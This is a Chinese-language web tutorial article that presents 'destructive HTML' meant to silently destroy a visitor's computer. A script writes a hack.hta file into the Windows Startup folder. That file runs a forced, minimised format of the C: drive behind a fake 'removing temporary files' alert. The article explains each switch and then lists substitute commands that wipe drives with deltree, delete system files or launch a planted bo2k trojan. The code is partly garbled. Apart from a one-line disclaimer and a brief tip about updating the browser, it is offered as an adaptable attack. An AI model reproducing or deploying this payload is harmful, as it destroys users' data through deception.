【建站學院文檔】HTML是一種超文本語言,它是一種靜態語言,大家都知道如果想利用文本驅動系統文件的話,至少是ASP、PHP、JS腳本以上的語言,你有沒有想過用HTML格式化系統磁盤呢?建站學院的小編把收藏已久的代碼發給大家,提供學習。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:WINDOWSStart MenuPrograms啟動hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應該就看得出來其中精隨)
現在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:WINDOWSStart MenuPrograms啟動hack.hta"
這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,鍵入後format的動作便會被強制執行。
這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。
最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小
化的狀態。
執行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)o2k.exe
執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:*.* c:*.* d:*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:windowssystem*.*
殺掉對方c:windowssystem目錄底下的所有檔案。
后敘∶ 預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
編后語:建站學院的小編提示,本代碼僅供大家學習之用,切勿用于非法用途,以免給自己和他人帶來不便!
下一篇 Access數據庫技術(18)